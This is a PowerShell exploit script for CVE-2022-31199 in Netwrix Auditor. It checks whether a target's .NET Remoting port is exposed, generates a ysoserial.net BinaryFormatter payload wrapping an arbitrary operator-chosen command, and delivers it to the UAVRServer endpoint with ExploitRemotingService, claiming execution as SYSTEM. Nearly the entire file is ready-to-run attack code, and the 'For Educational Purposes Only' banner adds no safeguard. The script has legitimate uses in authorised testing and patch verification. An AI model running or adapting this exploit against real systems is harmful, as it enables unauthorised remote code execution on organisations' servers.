<#
.SYNOPSIS
    CVE-2022-31199 - Netwrix Auditor RCE Exploit
    
.DESCRIPTION
    Exploits insecure .NET Remoting deserialization in Netwrix Auditor < 10.5
    Requires ysoserial.net and ExploitRemotingService
    
.PARAMETER Target
    Target IP address or hostname
    
.PARAMETER Port
    Target port (default: 9004)
    
.PARAMETER Command
    Command to execute on target
    
.EXAMPLE
    .\exploit.ps1 -Target 192.168.1.100 -Command "whoami"
    
.NOTES
    For Educational Purposes Only
#>

param(
    [Parameter(Mandatory=$true)]
    [string]$Target,
    
    [Parameter(Mandatory=$false)]
    [int]$Port = 9004,
    
    [Parameter(Mandatory=$false)]
    [string]$Command = "whoami",
    
    [Parameter(Mandatory=$false)]
    [switch]$CheckOnly
)

$Banner = @"
╔═══════════════════════════════════════════════════════╗
║     CVE-2022-31199 - Netwrix Auditor RCE Exploit     ║
║           Insecure .NET Remoting Deserialization      ║
║                                                       ║
║  CVSS: 9.8 CRITICAL | CWE-502                       ║
╚═══════════════════════════════════════════════════════╝

[!] For Educational Purposes Only
"@

Write-Host $Banner -ForegroundColor Cyan

# Check if required tools exist
function Test-RequiredTools {
    $ysoserialPath = ".\ysoserial.exe"
    $exploitPath = ".\ExploitRemotingService.exe"
    
    if (-not (Test-Path $ysoserialPath)) {
        Write-Host "[!] ysoserial.exe not found in current directory" -ForegroundColor Red
        Write-Host "[!] Download from: https://github.com/pwntester/ysoserial.net" -ForegroundColor Yellow
        return $false
    }
    
    if (-not (Test-Path $exploitPath)) {
        Write-Host "[!] ExploitRemotingService.exe not found" -ForegroundColor Red
        Write-Host "[!] Download from: https://github.com/tyranid/ExploitRemotingService" -ForegroundColor Yellow
        return $false
    }
    
    return $true
}

# Check if target is vulnerable
function Test-Vulnerable {
    param([string]$Target, [int]$Port)
    
    Write-Host "`n[*] Checking if target is vulnerable..." -ForegroundColor Yellow
    
    try {
        $tcpClient = New-Object System.Net.Sockets.TcpClient
        $tcpClient.Connect($Target, $Port)
        
        Write-Host "[+] Port $Port is open" -ForegroundColor Green
        
        # Send probe
        $stream = $tcpClient.GetStream()
        $probe = [byte[]](0x00,0x01,0x00,0x00,0x01,0x00,0x00,0x00)
        $stream.Write($probe, 0, $probe.Length)
        
        # Read response
        $buffer = New-Object byte[] 1024
        $bytesRead = $stream.Read($buffer, 0, 1024)
        
        $response = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
        
        $tcpClient.Close()
        
        if ($response -match "\.NET|Remoting|UAVRServer|Netwrix") {
            Write-Host "[+] .NET Remoting service detected!" -ForegroundColor Green
            Write-Host "[+] Target appears VULNERABLE to CVE-2022-31199" -ForegroundColor Red
            return $true
        } else {
            Write-Host "[-] .NET Remoting service not detected" -ForegroundColor Red
            return $false
        }
        
    } catch {
        Write-Host "[-] Error connecting to target: $_" -ForegroundColor Red
        return $false
    }
}

# Generate payload using ysoserial.net
function New-Payload {
    param([string]$Command)
    
    Write-Host "`n[*] Generating malicious payload..." -ForegroundColor Yellow
    Write-Host "[*] Command: $Command" -ForegroundColor Cyan
    
    # Use ysoserial.net to generate payload
    $ysoArgs = "-f BinaryFormatter -o base64 -g TypeConfuseDelegate -c `"$Command`""
    
    Write-Host "[*] Running: ysoserial.exe $ysoArgs" -ForegroundColor Gray
    
    $payload = & .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c $Command
    
    if ($LASTEXITCODE -eq 0 -and $payload) {
        Write-Host "[+] Payload generated successfully" -ForegroundColor Green
        return $payload
    } else {
        Write-Host "[-] Failed to generate payload" -ForegroundColor Red
        return $null
    }
}

# Exploit target using ExploitRemotingService
function Invoke-Exploit {
    param(
        [string]$Target,
        [int]$Port,
        [string]$Payload
    )
    
    Write-Host "`n[*] Exploiting target..." -ForegroundColor Yellow
    
    # Construct URI
    $uri = "tcp://${Target}:${Port}/UAVRServer"
    
    Write-Host "[*] Target URI: $uri" -ForegroundColor Cyan
    Write-Host "[*] Sending payload via ExploitRemotingService..." -ForegroundColor Yellow
    
    # Create temp file with payload
    $tempFile = [System.IO.Path]::GetTempFileName()
    $Payload | Out-File -FilePath $tempFile -Encoding ASCII
    
    # Execute ExploitRemotingService
    $exploitArgs = "-s $uri raw $tempFile"
    
    try {
        $result = & .\ExploitRemotingService.exe $exploitArgs 2>&1
        
        Write-Host "`n[*] Exploit result:" -ForegroundColor Cyan
        Write-Host $result
        
        if ($result -match "Exception|Error") {
            Write-Host "`n[+] Payload executed (exception returned)" -ForegroundColor Green
            Write-Host "[+] Command should have been executed with SYSTEM privileges" -ForegroundColor Green
        }
        
    } catch {
        Write-Host "[-] Error executing exploit: $_" -ForegroundColor Red
    } finally {
        Remove-Item $tempFile -ErrorAction SilentlyContinue
    }
}

# Main execution
Write-Host "`n[*] Target: $Target" -ForegroundColor Cyan
Write-Host "[*] Port: $Port" -ForegroundColor Cyan

# Check for required tools
if (-not (Test-RequiredTools)) {
    exit 1
}

# Test if target is vulnerable
if (Test-Vulnerable -Target $Target -Port $Port) {
    
    if ($CheckOnly) {
        Write-Host "`n[*] Check complete. Target is vulnerable." -ForegroundColor Yellow
        exit 0
    }
    
    # Generate payload
    $payload = New-Payload -Command $Command
    
    if ($payload) {
        # Exploit target
        Invoke-Exploit -Target $Target -Port $Port -Payload $payload
    }
    
} else {
    Write-Host "`n[-] Target does not appear vulnerable" -ForegroundColor Red
    exit 1
}

Write-Host "`n[*] Exploit complete" -ForegroundColor Green
